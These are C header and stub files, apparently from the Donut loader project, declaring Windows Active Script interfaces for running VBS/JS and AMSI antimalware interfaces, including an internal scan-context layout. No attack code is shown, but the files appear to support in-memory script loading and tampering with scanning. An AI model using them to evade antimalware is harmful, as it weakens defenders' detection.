164 | DPRINT("IActiveScriptSite::OnScriptTerminate"); | |
165 | ||
166 | return S_OK; | |
167 | } | |
168 | ||
169 | static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) { | |
170 | DPRINT("IActiveScriptSite::OnStateChange"); | |
171 | ||
172 | return S_OK; | |
173 | } | |
174 | ||
175 | static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) { | |
176 | DPRINT("IActiveScriptSite::OnEnterScript"); | |
177 | ||
178 | return S_OK; | |
179 | } | |
180 | ||
181 | static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) { | |
182 | DPRINT("IActiveScriptSite::OnLeaveScript"); | |
183 | ||
184 | return S_OK; | |
185 | }⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef IACTIVESCRIPT_H | |
32 | #define IACTIVESCRIPT_H | |
33 | ||
34 | #include "../include/donut.h" | |
35 | ||
36 | // required to load and run VBS or JS files | |
37 | typedef struct _IActiveScript IActiveScript; | |
38 | typedef struct _IActiveScriptError IActiveScriptError; | |
39 | typedef struct _IActiveScriptSite IActiveScriptSite; | |
40 | typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow; | |
41 | typedef struct _IActiveScriptParse32 IActiveScriptParse32; | |
42 | typedef struct _IActiveScriptParse64 IActiveScriptParse64; | |
43 | ||
44 | typedef enum tagSCRIPTSTATE { | |
45 | SCRIPTSTATE_UNINITIALIZED = 0, | |
46 | SCRIPTSTATE_STARTED = 1, | |
47 | SCRIPTSTATE_CONNECTED = 2, | |
48 | SCRIPTSTATE_DISCONNECTED = 3, | |
49 | SCRIPTSTATE_CLOSED = 4, | |
50 | SCRIPTSTATE_INITIALIZED = 5 | |
51 | } SCRIPTSTATE; | |
52 | ||
53 | typedef enum tagSCRIPTTHREADSTATE { | |
54 | SCRIPTTHREADSTATE_NOTINSCRIPT = 0, | |
55 | SCRIPTTHREADSTATE_RUNNING = 1 | |
56 | } SCRIPTTHREADSTATE; | |
57 | ||
58 | #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread. | |
59 | #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated. | |
60 | #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads. | |
61 | ||
62 | typedef DWORD SCRIPTTHREADID; | |
63 | ||
64 | #define SCRIPTITEM_ISPERSISTENT 0x00000001 | |
65 | #define SCRIPTITEM_ISVISIBLE 0x00000002 | |
66 | #define SCRIPTITEM_ISSOURCE 0x00000004 | |
67 | #define SCRIPTITEM_GLOBALMEMBERS 0x00000008 | |
68 | #define SCRIPTITEM_EXISTS 0x00000080 | |
69 | #define SCRIPTITEM_MULTIINSTANCE 0x00000100 | |
70 | #define SCRIPTITEM_CODEONLY 0x00000200 | |
71 | ||
72 | #define SCRIPTTEXT_ISPERSISTENT 0x00000001 | |
73 | #define SCRIPTTEXT_ISVISIBLE 0x00000002 | |
74 | #define SCRIPTTEXT_ISEXPRESSION 0x00000020 | |
75 | #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040 | |
76 | #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400 | |
77 | #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \ | |
78 | SCRIPTTEXT_ISVISIBLE | \ | |
79 | SCRIPTTEXT_ISEXPRESSION | \ | |
80 | SCRIPTTEXT_KEEPDEFINITIONS | \ | |
81 | SCRIPTTEXT_ALLOWEXECUTION) | |
82 | ||
83 | #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080 | |
84 | #define SCRIPTINFO_IUNKNOWN 0x00000001 | |
85 | #define SCRIPTINFO_ITYPEINFO 0x00000002 | |
86 | #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO) | |
87 | ||
88 | typedef struct IActiveScriptVtbl { | |
89 | BEGIN_INTERFACE | |
90 | ||
91 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
92 | IActiveScript * This, | |
93 | /* [in] */ REFIID riid, | |
94 | /* [annotation][iid_is][out] */ | |
95 | void **ppvObject); | |
96 | ||
97 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
98 | IActiveScript * This); | |
99 | ||
100 | ULONG ( STDMETHODCALLTYPE *Release )( | |
101 | IActiveScript * This); | |
102 | ||
103 | HRESULT ( STDMETHODCALLTYPE *SetScriptSite )( | |
104 | IActiveScript * This, | |
105 | /* [in] */ IActiveScriptSite *pass); | |
106 | ||
107 | HRESULT ( STDMETHODCALLTYPE *GetScriptSite )( | |
108 | IActiveScript * This, | |
109 | /* [in] */ REFIID riid, | |
110 | /* [iid_is][out] */ void **ppvObject); | |
111 | ||
112 | HRESULT ( STDMETHODCALLTYPE *SetScriptState )( | |
113 | IActiveScript * This, | |
114 | /* [in] */ SCRIPTSTATE ss); | |
115 | ||
116 | HRESULT ( STDMETHODCALLTYPE *GetScriptState )( | |
117 | IActiveScript * This, | |
118 | /* [out] */ SCRIPTSTATE *pssState); | |
119 | ||
120 | HRESULT ( STDMETHODCALLTYPE *Close )( | |
121 | IActiveScript * This); | |
122 | ||
123 | HRESULT ( STDMETHODCALLTYPE *AddNamedItem )( | |
124 | IActiveScript * This, | |
125 | /* [in] */ LPCOLESTR pstrName, | |
126 | /* [in] */ DWORD dwFlags); | |
127 | ||
128 | HRESULT ( STDMETHODCALLTYPE *AddTypeLib )( | |
129 | IActiveScript * This, | |
130 | /* [in] */ REFGUID rguidTypeLib, | |
131 | /* [in] */ DWORD dwMajor, | |
132 | /* [in] */ DWORD dwMinor, | |
133 | /* [in] */ DWORD dwFlags); | |
134 | ||
135 | HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )( | |
136 | IActiveScript * This, | |
137 | /* [in] */ LPCOLESTR pstrItemName, | |
138 | /* [out] */ IDispatch **ppdisp); | |
139 | ||
140 | HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )( | |
141 | IActiveScript * This, | |
142 | /* [out] */ SCRIPTTHREADID *pstidThread); | |
143 | ||
144 | HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )( | |
145 | IActiveScript * This, | |
146 | /* [in] */ DWORD dwWin32ThreadId, | |
147 | /* [out] */ SCRIPTTHREADID *pstidThread); | |
148 | ||
149 | HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )( | |
150 | IActiveScript * This, | |
151 | /* [in] */ SCRIPTTHREADID stidThread, | |
152 | /* [out] */ SCRIPTTHREADSTATE *pstsState); | |
153 | ||
154 | HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )( | |
155 | IActiveScript * This, | |
156 | /* [in] */ SCRIPTTHREADID stidThread, | |
157 | /* [in] */ const EXCEPINFO *pexcepinfo, | |
158 | /* [in] */ DWORD dwFlags); | |
159 | ||
160 | HRESULT ( STDMETHODCALLTYPE *Clone )( | |
161 | IActiveScript * This, | |
162 | /* [out] */ IActiveScript **ppscript); | |
163 | ||
164 | END_INTERFACE | |
165 | } IActiveScriptVtbl; | |
166 | ||
167 | typedef struct _IActiveScript { | |
168 | IActiveScriptVtbl *lpVtbl; | |
169 | } ActiveScript; | |
170 | ||
171 | typedef struct IActiveScriptParse32Vtbl { | |
172 | BEGIN_INTERFACE | |
173 | ||
174 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
175 | IActiveScriptParse32 * This, | |
176 | /* [in] */ REFIID riid, | |
177 | /* [annotation][iid_is][out] */ | |
178 | void **ppvObject); | |
179 | ||
180 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
181 | IActiveScriptParse32 * This); | |
182 | ||
183 | ULONG ( STDMETHODCALLTYPE *Release )( | |
184 | IActiveScriptParse32 * This); | |
185 | ||
186 | HRESULT ( STDMETHODCALLTYPE *InitNew )( | |
187 | IActiveScriptParse32 * This); | |
188 | ||
189 | HRESULT ( STDMETHODCALLTYPE *AddScriptlet )( | |
190 | IActiveScriptParse32 * This, | |
191 | /* [in] */ LPCOLESTR pstrDefaultName, | |
192 | /* [in] */ LPCOLESTR pstrCode, | |
193 | /* [in] */ LPCOLESTR pstrItemName, | |
194 | /* [in] */ LPCOLESTR pstrSubItemName, | |
195 | /* [in] */ LPCOLESTR pstrEventName, | |
196 | /* [in] */ LPCOLESTR pstrDelimiter, | |
197 | /* [in] */ DWORD dwSourceContextCookie, | |
198 | /* [in] */ ULONG ulStartingLineNumber, | |
199 | /* [in] */ DWORD dwFlags, | |
200 | /* [out] */ BSTR *pbstrName, | |
201 | /* [out] */ EXCEPINFO *pexcepinfo); | |
202 | ||
203 | HRESULT ( STDMETHODCALLTYPE *ParseScriptText )( | |
204 | IActiveScriptParse32 * This, | |
205 | /* [in] */ LPCOLESTR pstrCode, | |
206 | /* [in] */ LPCOLESTR pstrItemName, | |
207 | /* [in] */ IUnknown *punkContext, | |
208 | /* [in] */ LPCOLESTR pstrDelimiter, | |
209 | /* [in] */ DWORD dwSourceContextCookie, | |
210 | /* [in] */ ULONG ulStartingLineNumber, | |
211 | /* [in] */ DWORD dwFlags, | |
212 | /* [out] */ VARIANT *pvarResult, | |
213 | /* [out] */ EXCEPINFO *pexcepinfo); | |
214 | ||
215 | END_INTERFACE | |
216 | } IActiveScriptParse32Vtbl; | |
217 | ||
218 | typedef struct _IActiveScriptParse32 { | |
219 | IActiveScriptParse32Vtbl *lpVtbl; | |
220 | } ActiveScriptParse32; | |
221 | ||
222 | typedef struct IActiveScriptParse64Vtbl { | |
223 | BEGIN_INTERFACE | |
224 | ||
225 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
226 | IActiveScriptParse64 * This, | |
227 | /* [in] */ REFIID riid, | |
228 | /* [annotation][iid_is][out] */ | |
229 | void **ppvObject); | |
230 | ||
231 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
232 | IActiveScriptParse64 * This); | |
233 | ||
234 | ULONG ( STDMETHODCALLTYPE *Release )( | |
235 | IActiveScriptParse64 * This); | |
236 | ||
237 | HRESULT ( STDMETHODCALLTYPE *InitNew )( | |
238 | IActiveScriptParse64 * This); | |
239 | ||
240 | HRESULT ( STDMETHODCALLTYPE *AddScriptlet )( | |
241 | IActiveScriptParse64 *This, | |
242 | /* [in] */ LPCOLESTR pstrDefaultName, | |
243 | /* [in] */ LPCOLESTR pstrCode, | |
244 | /* [in] */ LPCOLESTR pstrItemName, | |
245 | /* [in] */ LPCOLESTR pstrSubItemName, | |
246 | /* [in] */ LPCOLESTR pstrEventName, | |
247 | /* [in] */ LPCOLESTR pstrDelimiter, | |
248 | /* [in] */ DWORDLONG dwSourceContextCookie, | |
249 | /* [in] */ ULONG ulStartingLineNumber, | |
250 | /* [in] */ DWORD dwFlags, | |
251 | /* [out] */ BSTR *pbstrName, | |
252 | /* [out] */ EXCEPINFO *pexcepinfo); | |
253 | ||
254 | HRESULT ( STDMETHODCALLTYPE *ParseScriptText )( | |
255 | IActiveScriptParse64 *This, | |
256 | /* [in] */ LPCOLESTR pstrCode, | |
257 | /* [in] */ LPCOLESTR pstrItemName, | |
258 | /* [in] */ IUnknown *punkContext, | |
259 | /* [in] */ LPCOLESTR pstrDelimiter, | |
260 | /* [in] */ DWORDLONG dwSourceContextCookie, | |
261 | /* [in] */ ULONG ulStartingLineNumber, | |
262 | /* [in] */ DWORD dwFlags, | |
263 | /* [out] */ VARIANT *pvarResult, | |
264 | /* [out] */ EXCEPINFO *pexcepinfo); | |
265 | ||
266 | END_INTERFACE | |
267 | } IActiveScriptParse64Vtbl; | |
268 | ||
269 | typedef struct _IActiveScriptParse64 { | |
270 | IActiveScriptParse64Vtbl *lpVtbl; | |
271 | } ActiveScriptParse64; | |
272 | ||
273 | typedef struct _IActiveScriptSiteWindowVtbl { | |
274 | BEGIN_INTERFACE | |
275 | ||
276 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
277 | IActiveScriptSiteWindow * This, | |
278 | /* [in] */ REFIID riid, | |
279 | /* [annotation][iid_is][out] */ | |
280 | void **ppvObject); | |
281 | ||
282 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
283 | IActiveScriptSiteWindow * This); | |
284 | ||
285 | ULONG ( STDMETHODCALLTYPE *Release )( | |
286 | IActiveScriptSiteWindow * This); | |
287 | ||
288 | HRESULT ( STDMETHODCALLTYPE *GetWindow )( | |
289 | IActiveScriptSiteWindow * This, | |
290 | /* [out] */ HWND *phwnd); | |
291 | ||
292 | HRESULT ( STDMETHODCALLTYPE *EnableModeless )( | |
293 | IActiveScriptSiteWindow * This, | |
294 | /* [in] */ BOOL fEnable); | |
295 | ||
296 | END_INTERFACE | |
297 | } IActiveScriptSiteWindowVtbl; | |
298 | ||
299 | typedef struct _IActiveScriptSiteWindow { | |
300 | IActiveScriptSiteWindowVtbl *lpVtbl; | |
301 | } ActiveScriptSiteWindow; | |
302 | ||
303 | typedef struct _IActiveScriptErrorVtbl { | |
304 | BEGIN_INTERFACE | |
305 | ||
306 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
307 | IActiveScriptError * This, | |
308 | /* [in] */ REFIID riid, | |
309 | /* [annotation][iid_is][out] */ | |
310 | void **ppvObject); | |
311 | ||
312 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
313 | IActiveScriptError * This); | |
314 | ||
315 | ULONG ( STDMETHODCALLTYPE *Release )( | |
316 | IActiveScriptError * This); | |
317 | ||
318 | /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )( | |
319 | IActiveScriptError * This, | |
320 | /* [out] */ EXCEPINFO *pexcepinfo); | |
321 | ||
322 | HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )( | |
323 | IActiveScriptError * This, | |
324 | /* [out] */ DWORD *pdwSourceContext, | |
325 | /* [out] */ ULONG *pulLineNumber, | |
326 | /* [out] */ LONG *plCharacterPosition); | |
327 | ||
328 | HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )( | |
329 | IActiveScriptError * This, | |
330 | /* [out] */ BSTR *pbstrSourceLine); | |
331 | ||
332 | END_INTERFACE | |
333 | } IActiveScriptErrorVtbl; | |
334 | ||
335 | typedef struct _IActiveScriptError { | |
336 | IActiveScriptErrorVtbl *lpVtbl; | |
337 | } ActiveScriptError; | |
338 | ||
339 | typedef struct _IActiveScriptSiteVtbl { | |
340 | BEGIN_INTERFACE | |
341 | ||
342 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
343 | IActiveScriptSite * This, | |
344 | /* [in] */ REFIID riid, | |
345 | /* [annotation][iid_is][out] */ | |
346 | void **ppvObject); | |
347 | ||
348 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
349 | IActiveScriptSite * This); | |
350 | ||
351 | ULONG ( STDMETHODCALLTYPE *Release )( | |
352 | IActiveScriptSite * This); | |
353 | ||
354 | HRESULT ( STDMETHODCALLTYPE *GetLCID )( | |
355 | IActiveScriptSite * This, | |
356 | /* [out] */ LCID *plcid); | |
357 | ||
358 | HRESULT ( STDMETHODCALLTYPE *GetItemInfo )( | |
359 | IActiveScriptSite * This, | |
360 | /* [in] */ LPCOLESTR pstrName, | |
361 | /* [in] */ DWORD dwReturnMask, | |
362 | /* [out] */ IUnknown **ppiunkItem, | |
363 | /* [out] */ ITypeInfo **ppti); | |
364 | ||
365 | HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )( | |
366 | IActiveScriptSite * This, | |
367 | /* [out] */ BSTR *pbstrVersion); | |
368 | ||
369 | HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )( | |
370 | IActiveScriptSite * This, | |
371 | /* [in] */ const VARIANT *pvarResult, | |
372 | /* [in] */ const EXCEPINFO *pexcepinfo); | |
373 | ||
374 | HRESULT ( STDMETHODCALLTYPE *OnStateChange )( | |
375 | IActiveScriptSite * This, | |
376 | /* [in] */ SCRIPTSTATE ssScriptState); | |
377 | ||
378 | HRESULT ( STDMETHODCALLTYPE *OnScriptError )( | |
379 | IActiveScriptSite * This, | |
380 | /* [in] */ IActiveScriptError *pscripterror); | |
381 | ||
382 | HRESULT ( STDMETHODCALLTYPE *OnEnterScript )( | |
383 | IActiveScriptSite * This); | |
384 | ||
385 | HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )( | |
386 | IActiveScriptSite * This); | |
387 | ||
388 | END_INTERFACE | |
389 | } IActiveScriptSiteVtbl; | |
390 | ||
391 | typedef struct _IActiveScriptSite { | |
392 | IActiveScriptSiteVtbl *lpVtbl; | |
393 | ULONG m_cRef; // reference count (not part of original definition of course) | |
394 | } ActiveScriptSite; | |
395 | ||
396 | #ifdef _WIN64 | |
397 | #define IActiveScriptParse IActiveScriptParse64 | |
398 | #define IID_IActiveScriptParse IID_IActiveScriptParse64 | |
399 | #else | |
400 | #define IActiveScriptParse IActiveScriptParse32 | |
401 | #define IID_IActiveScriptParse IID_IActiveScriptParse32 | |
402 | #endif | |
403 | ||
404 | static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this); | |
405 | ||
406 | static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv); | |
407 | static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this); | |
408 | static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this); | |
409 | ||
410 | // Informs the host that the scripting engine has begun executing the script code. | |
411 | static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this); | |
412 | ||
413 | // Informs the host that the scripting engine has returned from executing script code. | |
414 | static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this); | |
415 | ||
416 | // Retrieves the locale identifier that the host uses for displaying user-interface elements. | |
417 | static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid); | |
418 | ||
419 | // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view. | |
420 | static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version); | |
421 | ||
422 | // Informs the host that an execution error occurred while the engine was running the script. | |
423 | static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError); | |
424 | ||
425 | // Informs the host that the scripting engine has changed states. | |
426 | static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state); | |
427 | ||
428 | // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method. | |
429 | static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo); | |
430 | ||
431 | // Called when the script has completed execution. | |
432 | static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei); | |
433 | ||
434 | #endif | |
435 |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef AMSI_H | |
32 | #define AMSI_H | |
33 | ||
34 | #include <windows.h> | |
35 | ||
36 | DECLARE_HANDLE(HAMSICONTEXT); | |
37 | DECLARE_HANDLE(HAMSISESSION); | |
38 | ||
39 | typedef struct _IAmsiStream IAmsiStream; | |
40 | typedef struct _IAntimalware IAntimalware; | |
41 | typedef struct _IAntimalwareProvider IAntimalwareProvider; | |
42 | ||
43 | typedef enum tagAMSI_RESULT { | |
44 | // No detection found. Result likely not going to change after future definition update. | |
45 | // a.k.a. known good | |
46 | AMSI_RESULT_CLEAN = 0, | |
47 | // No detection found. Result might change after future definition update. | |
48 | AMSI_RESULT_NOT_DETECTED = 1, | |
49 | // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script. | |
50 | // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate. | |
51 | // The large the result, the riskier to continue. | |
52 | // Any return result equal to or larger than 32768 is consider malware and should be blocked. | |
53 | // These values are provider specific, and may indicate malware family or ID. | |
54 | // An application should use AmsiResultIsMalware() to determine whether the content should be blocked. | |
55 | AMSI_RESULT_DETECTED = 32768, | |
56 | } AMSI_RESULT; | |
57 | ||
58 | typedef enum tagAMSI_ATTRIBUTE { | |
59 | // Name/version/GUID string of the calling application. | |
60 | AMSI_ATTRIBUTE_APP_NAME = 0, | |
61 | // LPWSTR, filename, URL, script unique id etc. | |
62 | AMSI_ATTRIBUTE_CONTENT_NAME = 1, | |
63 | // ULONGLONG, size of the input. Mandatory. | |
64 | AMSI_ATTRIBUTE_CONTENT_SIZE = 2, | |
65 | // PVOID, memory address if content is fully loaded in memory. Mandatory unless | |
66 | // Read() is implemented instead to support on-demand content retrieval. | |
67 | AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3, | |
68 | // PVOID, session is used to associate different scan calls, e.g. if the contents | |
69 | // to be scanned belong to the sample original script. Return nullptr if content | |
70 | // is self-contained. Mandatory. | |
71 | AMSI_ATTRIBUTE_SESSION = 4, | |
72 | } AMSI_ATTRIBUTE; | |
73 | ||
74 | typedef struct IAmsiStreamVtbl { | |
75 | BEGIN_INTERFACE | |
76 | ||
77 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
78 | IAmsiStream * This, | |
79 | REFIID riid, | |
80 | void **ppvObject); | |
81 | ||
82 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
83 | IAmsiStream * This); | |
84 | ||
85 | ULONG ( STDMETHODCALLTYPE *Release )( | |
86 | IAmsiStream * This); | |
87 | ||
88 | HRESULT ( STDMETHODCALLTYPE *GetAttribute )( | |
89 | IAmsiStream * This, | |
90 | AMSI_ATTRIBUTE attribute, | |
91 | ULONG dataSize, | |
92 | unsigned char *data, | |
93 | ULONG *retData); | |
94 | ||
95 | HRESULT ( STDMETHODCALLTYPE *Read )( | |
96 | IAmsiStream * This, | |
97 | ULONGLONG position, | |
98 | ULONG size, | |
99 | unsigned char *buffer, | |
100 | ULONG *readSize); | |
101 | ||
102 | END_INTERFACE | |
103 | } IAmsiStreamVtbl; | |
104 | ||
105 | typedef struct _IAmsiStream { | |
106 | IAmsiStreamVtbl *lpVtbl; | |
107 | } AmsiStream; | |
108 | ||
109 | typedef struct IAntimalwareProviderVtbl { | |
110 | BEGIN_INTERFACE | |
111 | ||
112 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( | |
113 | IAntimalwareProvider * This, | |
114 | REFIID riid, | |
115 | void **ppvObject); | |
116 | ||
117 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
118 | IAntimalwareProvider * This); | |
119 | ||
120 | ULONG ( STDMETHODCALLTYPE *Release )( | |
121 | IAntimalwareProvider * This); | |
122 | ||
123 | HRESULT ( STDMETHODCALLTYPE *Scan )( | |
124 | IAntimalwareProvider * This, | |
125 | IAmsiStream *stream, | |
126 | AMSI_RESULT *result); | |
127 | ||
128 | void ( STDMETHODCALLTYPE *CloseSession )( | |
129 | IAntimalwareProvider * This, | |
130 | ULONGLONG session); | |
131 | ||
132 | HRESULT ( STDMETHODCALLTYPE *DisplayName )( | |
133 | IAntimalwareProvider * This, | |
134 | LPWSTR *displayName); | |
135 | ||
136 | END_INTERFACE | |
137 | } IAntimalwareProviderVtbl; | |
138 | ||
139 | typedef struct _IAntimalwareProvider { | |
140 | IAntimalwareProviderVtbl *lpVtbl; | |
141 | } AntimalwareProvider; | |
142 | ||
143 | typedef struct IAntimalwareVtbl { | |
144 | BEGIN_INTERFACE | |
145 | ||
146 | HRESULT ( STDMETHODCALLTYPE *QueryInterface)( | |
147 | IAntimalware *This, | |
148 | REFIID riid, | |
149 | void **ppvObject); | |
150 | ||
151 | ULONG ( STDMETHODCALLTYPE *AddRef )( | |
152 | IAntimalware * This); | |
153 | ||
154 | ULONG ( STDMETHODCALLTYPE *Release )( | |
155 | IAntimalware * This); | |
156 | ||
157 | HRESULT ( STDMETHODCALLTYPE *Scan )( | |
158 | IAntimalware * This, | |
159 | IAmsiStream *stream, | |
160 | AMSI_RESULT *result, | |
161 | IAntimalwareProvider **provider); | |
162 | ||
163 | void ( STDMETHODCALLTYPE *CloseSession )( | |
164 | IAntimalware * This, | |
165 | ULONGLONG session); | |
166 | ||
167 | END_INTERFACE | |
168 | } IAntimalwareVtbl; | |
169 | ||
170 | typedef struct _IAntimalware { | |
171 | IAntimalwareVtbl *lpVtbl; | |
172 | } Antimalware; | |
173 | ||
174 | typedef struct tagHAMSICONTEXT { | |
175 | DWORD Signature; // "AMSI" or 0x49534D41 | |
176 | PWCHAR AppName; // set by AmsiInitialize | |
177 | IAntimalware *Antimalware; // set by AmsiInitialize | |
178 | DWORD SessionCount; // increased by AmsiOpenSession | |
179 | } _HAMSICONTEXT, *_PHAMSICONTEXT; | |
180 | ||
181 | #endif⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
